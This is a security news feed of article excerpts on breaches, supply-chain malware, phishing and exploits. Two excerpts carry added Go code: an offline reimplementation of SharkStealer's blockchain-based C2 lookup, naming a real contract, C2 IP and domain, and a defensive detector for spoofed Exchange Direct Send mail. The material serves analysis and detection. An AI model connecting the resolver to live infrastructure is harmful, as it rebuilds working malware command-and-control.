• Toys “R” Us Canada has alerted its customers to a significant data breach that may have compromised personal information. The company sent notification emails to affected customers on Thursday morning, confirming that unauthorized access to their databases occurred. According to the notification, the toy retailer discovered the breach after learning on July 30 that someone […]

    The post Toys “R” Us Canada Data Breach Exposes Customer Personal Information appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • Socket’s Threat Research Team has uncovered a sophisticated supply chain attack targeting cryptocurrency developers through the NuGet package registry. The malicious packages, which exfiltrate sensitive wallet data including private keys and mnemonics, highlight a critical vulnerability in package registry security practices. The attack centers on a package named Netherеum.All, which appears identical to the legitimate […]

    The post Malicious NuGet Packages Pose as Nethereum, Steal Crypto Wallet Keys appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • Microsoft has rolled out a significant security enhancement to Windows File Explorer, automatically disabling the preview pane for files downloaded from the internet as part of security updates released on and after October 14, 2025. This proactive measure targets a long-standing vulnerability that attackers have exploited to harvest NTLM hashes and sensitive credentials used for […]

    The post Microsoft Boosts Windows Security by Disabling File Previews for Downloads appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • Cybersecurity researchers have discovered a self-propagating worm that spreads via Visual Studio Code (VS Code) extensions on the Open VSX Registry and the Microsoft Extension Marketplace, underscoring how developers have become a prime target for attacks. The sophisticated threat, codenamed GlassWorm by Koi Security, is the second such supply chain attack to hit the DevOps space within a span


  • A sophisticated information-stealing malware written in Golang has emerged, leveraging blockchain technology to establish covert command-and-control channels.

    SharkStealer represents a significant evolution in malware design, utilizing the BNB Smart Chain Testnet as a resilient dead-drop resolver for its C2 infrastructure.

    This novel approach demonstrates how threat actors exploit Web3 technologies to evade traditional detection mechanisms and maintain persistent communication channels.

    The malware employs an innovative technique known as EtherHiding, where critical infection chain components are stored on public blockchains rather than conventional web servers.

    This method transforms immutable blockchain networks into censorship-resistant infrastructure that defenders struggle to disrupt or monitor effectively.

    By embedding C2 addresses within smart contract responses, SharkStealer creates a distributed communication layer that remains operational even when traditional domains or IP addresses are blocked.

    SharkStealer’s attack vector centers on leveraging the transparency and availability of public blockchain networks while maintaining operational security through encryption.

    VMRay analysts found that the malware issues Ethereum JSON-RPC eth_call requests to specific smart contracts deployed on the BSC Testnet.

    These contracts serve as encrypted data repositories, returning tuples containing an initialization vector (IV) and encrypted payload when queried.

    The malware then decrypts this data using a hardcoded AES-CFB key embedded within the binary, ultimately extracting the actual C2 server addresses.

    Technical Analysis of C2 Resolution

    The infection mechanism operates through a multi-stage process that begins with establishing a secure connection to data-seed-prebsc-2-s1.binance.org:8545, the BSC Testnet RPC endpoint.

    The snippet below, taken from the decompiled sample, shows how SharkStealer populates the JSON-RPC request:

    v87.Jsonrpc.ptr = "2.0";            /* JSON-RPC version */
    v87.Method.ptr = "eth_call";        /* read-only contract call; no transaction is sent */
    v77.To.ptr = "0x3dd7a9c28cfedf1c462581eb7150212bcf3f9edf";  /* dead-drop contract on the BSC Testnet */
    v77.Data.ptr = "0x24c12bf6";        /* 4-byte selector of the getter function */

    Smart Contract Request Construction (Source – VMRay)

    C2 resolution combines the on-chain lookup with conventional symmetric cryptography.

    Once the eth_call reaches either of the two contract addresses observed (0xc2c25784E78AeE4C2Cb16d40358632Ed27eeaF8E and 0x3dd7a9c28cfedf1c462581eb7150212bcf3f9edf), the contract runs the function with selector 0x24c12bf6 and returns the encrypted C2 data.

    The decryption process utilizes AES-CFB mode, combining the hardcoded key with the dynamically retrieved IV to decrypt the payload.

    Analysis of sample SHA-256 hash 3d54cbbab911d09ecaec19acb292e476b0073d14e227d79919740511109d9274 revealed active C2 servers at 84.54.44.48 and securemetricsapi.live, demonstrating the technique’s operational effectiveness.
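    The resolution chain described above, reimplemented in Go as an added example (this is not VMRay's code and not the SharkStealer binary's). It builds the same eth_call request, then walks a contract response through ABI decoding and AES-CFB decryption to recover the C2 list. Everything the write-up does not state is an assumption and is marked as such in the code: the contract's return layout is taken to be the standard ABI encoding of (bytes iv, bytes ciphertext); the decrypted plaintext is taken to hold one C2 per line; the key and IV are constructed demo values, not the sample's real hardcoded key; and fakeDeadDrop stands in for the Testnet node so nothing touches the network. The contract address, the selector and the two C2 values are the ones reported in the analysis.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"encoding/hex"
	"encoding/json"
	"fmt"
	"math/big"
	"strings"
)

// Contract address and function selector quoted from the VMRay analysis.
const deadDropContract, getterSelector = "0x3dd7a9c28cfedf1c462581eb7150212bcf3f9edf", "0x24c12bf6"

// rpcFunc stands in for the HTTP POST to data-seed-prebsc-2-s1.binance.org:8545 (stubbed below).
type rpcFunc func(requestBody []byte) ([]byte, error)

// buildEthCallRequest builds the JSON-RPC body seen in the decompiled sample: a
// read-only eth_call against the dead-drop contract with a 4-byte selector.
func buildEthCallRequest(to, selector string) []byte {
	req, _ := json.Marshal(map[string]any{"jsonrpc": "2.0", "id": 1, "method": "eth_call",
		"params": []any{map[string]string{"to": to, "data": selector}, "latest"}})
	return req // marshalling string literals cannot fail, so the error is dropped
}

// ASSUMPTION: the write-up only says the contract returns an (IV, ciphertext) tuple; these
// helpers use the standard Solidity ABI layout for a function returning (bytes, bytes).
func abiWord(n int) []byte { return big.NewInt(int64(n)).FillBytes(make([]byte, 32)) }
func abiPad(x []byte) []byte { return append(append([]byte{}, x...), make([]byte, (32-len(x)%32)%32)...) }

func abiEncodeBytesPair(a, b []byte) []byte {
	out := append(abiWord(64), abiWord(96+len(abiPad(a)))...) // head: offsets of both dynamic fields
	out = append(out, append(abiWord(len(a)), abiPad(a)...)...)
	return append(out, append(abiWord(len(b)), abiPad(b)...)...)
}

// abiDecodeBytesPair bounds-checks every offset and length so a malformed or
// hostile contract response yields an error instead of a panic.
func abiDecodeBytesPair(d []byte) (a, b []byte, err error) {
	word := func(off int) (int, bool) { // 32-byte big-endian word; false if it cannot index d
		if off+32 > len(d) {
			return 0, false
		}
		n := new(big.Int).SetBytes(d[off : off+32])
		return int(n.Int64()), n.IsInt64() && n.Int64() <= int64(len(d))
	}
	field := func(head int) ([]byte, error) {
		off, ok := word(head)
		if n, ok2 := word(off); ok && ok2 && off+32+n <= len(d) {
			return d[off+32 : off+32+n], nil
		}
		return nil, fmt.Errorf("abi: bad dynamic field at head offset %d", head)
	}
	if a, err = field(0); err == nil {
		b, err = field(32)
	}
	return a, b, err
}

// aesCFB runs AES in CFB mode; CFB is a stream mode, so one routine serves the
// stub (encrypt) and the resolver (decrypt) and no padding is involved.
func aesCFB(key, iv, in []byte, decrypt bool) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil || len(iv) != block.BlockSize() { // IV is chain-supplied: check before NewCFB* panics
		return nil, fmt.Errorf("aesCFB: bad key or iv (%v)", err)
	}
	stream := cipher.NewCFBEncrypter(block, iv)
	if decrypt {
		stream = cipher.NewCFBDecrypter(block, iv)
	}
	out := make([]byte, len(in))
	stream.XORKeyStream(out, in)
	return out, nil
}

// resolveC2 is the EtherHiding lookup end to end: eth_call -> JSON-RPC result -> ABI (iv, ciphertext)
// -> AES-CFB decrypt -> C2 list. ASSUMPTION: one C2 per line; the write-up does not state the format.
func resolveC2(rpc rpcFunc, key []byte, contract string) ([]string, error) {
	body, err := rpc(buildEthCallRequest(contract, getterSelector))
	if err != nil { return nil, err }
	var resp struct{ Result string `json:"result"` }
	if err = json.Unmarshal(body, &resp); err != nil { return nil, err }
	raw, err := hex.DecodeString(strings.TrimPrefix(resp.Result, "0x"))
	if err != nil { return nil, err }
	iv, ct, err := abiDecodeBytesPair(raw)
	if err != nil { return nil, err }
	pt, err := aesCFB(key, iv, ct, true)
	if err != nil { return nil, err }
	return strings.Fields(string(pt)), nil
}

// fakeDeadDrop plays the BSC Testnet node: it answers any eth_call with an ABI-encoded
// (iv, AES-CFB(plaintext)) tuple, so nothing leaves the machine.
func fakeDeadDrop(key, iv []byte, plaintext string) rpcFunc {
	return func(_ []byte) ([]byte, error) {
		ct, err := aesCFB(key, iv, []byte(plaintext), false)
		if err != nil { return nil, err }
		result := "0x" + hex.EncodeToString(abiEncodeBytesPair(iv, ct))
		return json.Marshal(map[string]any{"jsonrpc": "2.0", "id": 1, "result": result})
	}
}

func main() {
	// Constructed demo key (32 bytes, AES-256) and IV; the sample's real key is not reproduced here.
	key, iv := []byte("0123456789abcdef0123456789abcdef"), []byte("fedcba9876543210")
	rpc := fakeDeadDrop(key, iv, "84.54.44.48\nsecuremetricsapi.live\n") // C2s reported for the sample
	fmt.Println(resolveC2(rpc, key, deadDropContract))
}
```

    Running it prints [84.54.44.48 securemetricsapi.live] <nil>. For detection, the parts that do not change between campaigns are the useful ones: an HTTPS POST carrying "method":"eth_call" to a public RPC host from a process with no reason to talk to a blockchain, the contract addresses in the params, and the 0x24c12bf6 selector. Blocking the two C2 values alone does not help, since the operator can point the contract at new ones without touching the binary.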


    The post SharkStealer Using EtherHiding Pattern to Resolves Communications With C2 Channels appeared first on Cyber Security News.


  • Check Point Research has uncovered a massive malware distribution operation called the YouTube Ghost Network, featuring over 3,000 malicious videos designed to infect unsuspecting users with dangerous information-stealing malware. This sophisticated cybercriminal network has been operating since at least 2021, with activity tripling in 2025 as threat actors increasingly exploit YouTube’s trusted platform to bypass […]

    The post YouTube Ghost Malware Campaign: Over 3,000 Infected Videos Target Users appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • A critical zero-day vulnerability in Samsung’s flagship Galaxy S25 smartphone was successfully exploited at Pwn2Own Ireland 2025, demonstrating how attackers could silently activate the device’s camera and track a user’s real-time location. Security researchers Ben R. and Georgi G. from Interrupt Labs revealed the sophisticated exploit during the competition’s final day, earning $50,000 in prize […]

    The post Hackers Exploit Galaxy S25 0-Day to Turn On Camera and Track Users appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • Microsoft 365 Exchange Online’s Direct Send feature, originally designed to enable legacy devices and applications to send emails without authentication, has become an exploitable pathway for cybercriminals conducting sophisticated phishing and business email compromise attacks.

    The feature allows multifunction printers, scanners, and older line-of-business applications to transmit messages by bypassing rigorous authentication and security checks, creating an operational convenience that adversaries have weaponized to circumvent standard content filters and domain verification protocols.

    Recent investigations reveal a surge in malicious campaigns exploiting Direct Send to deliver fraudulent messages that appear to originate from trusted internal sources.

    Threat actors emulate legitimate device traffic and send unauthenticated emails impersonating executives, IT help desks, and internal users.

    These campaigns frequently employ business-themed social engineering lures, including task approvals, voicemail notifications, and payment prompts designed to manipulate recipients into divulging credentials or sensitive information.

    Cisco Talos analysts identified increased activity by malicious actors leveraging Direct Send as part of coordinated phishing campaigns and BEC attacks.

    Security researchers from multiple organizations, including Varonis, Abnormal Security, Ironscales, Proofpoint, Barracuda, and Mimecast, have independently confirmed similar findings, indicating that adversaries have actively targeted corporations using Direct Send in recent months.

    Direct Send Exploitation

    The attacks exploit the implicit trust Exchange Online extends to Direct Send traffic: messages arrive as if from the organization's own devices, so they receive less scrutiny and slip past the sender verification that would otherwise stop them.

    The technique centers on circumventing the three standard email authentication protocols: DomainKeys Identified Mail (DKIM), Sender Policy Framework (SPF), and Domain-based Message Authentication, Reporting and Conformance (DMARC).

    Spoofed American Express dispute (left), fake ACH payment notice (right) (Source – Cisco Talos)

    Under normal circumstances these protocols verify message authenticity through cryptographic signatures, authorized IP ranges, and policy enforcement, and a message that fails them is rejected or quarantined.

    Direct Send messages are accepted even though they fail these checks, so spoofed messages reach recipients unchallenged.

    Attackers have embedded QR codes within PDFs and crafted empty-body messages with obfuscated attachments, successfully evading traditional content filters and directing victims to credential harvesting pages.

    Microsoft has responded by introducing a Public Preview of the RejectDirectSend control and announcing future enhancements, including Direct Send-specific usage reports and a default-off configuration for new tenants.

    Organizations can mitigate the risk in three steps: first, inventory the devices and applications that legitimately use Direct Send and validate their mail flows; second, migrate them to authenticated SMTP submission on port 587, keeping tightly scoped IP restrictions only for devices that cannot authenticate; third, disable Direct Send for the tenant with Set-OrganizationConfig -RejectDirectSend $true.
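    A triage check for the pattern described above, added here as an example in Go (it is not Cisco Talos's or Microsoft's detection logic). It parses a message's headers and flags mail that claims an internal sender domain, passed neither SPF nor DKIM, and was not accepted from an allow-listed device range, which is what remains of Direct Send abuse once legitimate devices have been moved to authenticated submission or pinned to known IPs. The two messages, the corp.example domain, the 192.0.2.0/24 device range and the Received header format are constructed for the example; real Exchange Online headers carry more fields, and the Authentication-Results handling is a token scan, not a full RFC 8601 parser.

```go
package main

import (
	"fmt"
	"net/mail"
	"net/netip"
	"regexp"
	"strings"
)

// Policy describes the tenant: domains whose mail should always authenticate,
// and the narrow device ranges still allowed to use Direct Send unauthenticated.
type Policy struct {
	InternalDomains []string
	DeviceAllowlist []netip.Prefix
}

type Verdict struct { // attached to each message for the SOC to act on
	Suspicious bool
	Reasons    []string
}

var (
	bracketedIPv4 = regexp.MustCompile(`\[(\d{1,3}(?:\.\d{1,3}){3})\]`)
	authToken     = regexp.MustCompile(`\b(spf|dkim|dmarc)=([a-z]+)`)
)

// connectingIP reads the first Received header (the one the accepting MTA prepended) and
// returns the peer address in it. ASSUMPTION: the address is written in square brackets.
func connectingIP(h mail.Header) (netip.Addr, bool) {
	if rcv := h["Received"]; len(rcv) > 0 {
		if m := bracketedIPv4.FindStringSubmatch(rcv[0]); m != nil {
			a, err := netip.ParseAddr(m[1])
			return a, err == nil
		}
	}
	return netip.Addr{}, false
}

// authResults flattens every Authentication-Results header into
// mechanism -> result, e.g. {"spf": "fail", "dkim": "none", "dmarc": "fail"}.
func authResults(h mail.Header) map[string]string {
	out := map[string]string{}
	for _, v := range h["Authentication-Results"] {
		for _, m := range authToken.FindAllStringSubmatch(strings.ToLower(v), -1) {
			out[m[1]] = m[2]
		}
	}
	return out
}

// TriageDirectSend flags a message that claims an internal sender, passed neither SPF nor
// DKIM, and was not accepted from an allow-listed device IP. Added heuristic, not a vendor rule.
func TriageDirectSend(raw string, p Policy) (Verdict, error) {
	msg, err := mail.ReadMessage(strings.NewReader(raw))
	if err != nil {
		return Verdict{}, err
	}
	from, err := mail.ParseAddress(msg.Header.Get("From"))
	if err != nil {
		return Verdict{}, err
	}
	domain := from.Address[strings.LastIndex(from.Address, "@")+1:]
	internal := false
	for _, d := range p.InternalDomains {
		internal = internal || strings.EqualFold(d, domain)
	}
	if !internal {
		return Verdict{}, nil // external senders are covered by ordinary DMARC handling
	}
	var v Verdict
	ar := authResults(msg.Header)
	if ar["spf"] != "pass" && ar["dkim"] != "pass" {
		v.Reasons = append(v.Reasons, fmt.Sprintf("internal sender %s unauthenticated (spf=%q dkim=%q)", domain, ar["spf"], ar["dkim"]))
	}
	ip, ok := connectingIP(msg.Header)
	allowed := false
	for _, pfx := range p.DeviceAllowlist {
		allowed = allowed || (ok && pfx.Contains(ip))
	}
	if !allowed {
		v.Reasons = append(v.Reasons, fmt.Sprintf("connecting host %v is not an allow-listed device", ip))
	}
	v.Suspicious = len(v.Reasons) == 2 // unauthenticated AND not a known device
	return v, nil
}

// Constructed sample messages (RFC 5737 documentation addresses); not real captures.
const spoofedMsg = "Received: from mail.corp.example ([203.0.113.50]) by tenant.mail.protection.outlook.com\r\n" +
	"Authentication-Results: spf=fail (sender IP is 203.0.113.50) smtp.mailfrom=corp.example; dkim=none; dmarc=fail action=none\r\n" +
	"From: \"CEO\" <ceo@corp.example>\r\nTo: finance@corp.example\r\nSubject: Urgent ACH payment approval\r\n\r\nPlease see the attached PDF.\r\n"
const printerMsg = "Received: from printer01.corp.example ([192.0.2.10]) by tenant.mail.protection.outlook.com\r\n" +
	"Authentication-Results: spf=none smtp.mailfrom=corp.example; dkim=none; dmarc=none\r\n" +
	"From: scanner@corp.example\r\nTo: finance@corp.example\r\nSubject: Scanned document\r\n\r\nSee attachment.\r\n"

func main() {
	p := Policy{InternalDomains: []string{"corp.example"}, DeviceAllowlist: []netip.Prefix{netip.MustParsePrefix("192.0.2.0/24")}}
	fmt.Println(TriageDirectSend(spoofedMsg, p))
	fmt.Println(TriageDirectSend(printerMsg, p))
}
```

    The policy object is the same data the mitigation steps produce: the accepted domains and the IP ranges left on an inbound connector or a Direct Send exception. The printer message shows why the allow-list matters: it is just as unauthenticated as the spoof, and only the known source address separates the two. Once RejectDirectSend is enabled and every device authenticates, the allow-list can be emptied and any hit on this rule is a spoof.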


    The post Hackers Abuse Microsoft 365 Exchange Direct Send to Bypass Content Filters and Harvest Sensitive Data appeared first on Cyber Security News.


  • Security researchers have discovered a sophisticated method that allows attackers to steal access tokens from Microsoft Teams, potentially granting unauthorized access to sensitive corporate communications, emails, and SharePoint documents. The attack vector represents a significant security risk for organizations relying on Microsoft’s productivity suite, as stolen tokens can be weaponized for lateral movement within company […]

    The post Hackers Steal Microsoft Teams Chats & Emails by Grabbing Access Tokens appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • A new phishing campaign is targeting Microsoft account holders by using a clever twist on OAuth authentication prompts. Instead of asking users to hand over their passwords directly, attackers are tricking people into granting permission to malicious applications through legitimate-looking Microsoft authorization screens. This method bypasses traditional password protection and multi-factor authentication, making it particularly […]

    The post New Phishing Wave Uses OAuth Prompts to Take Over Microsoft Accounts appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
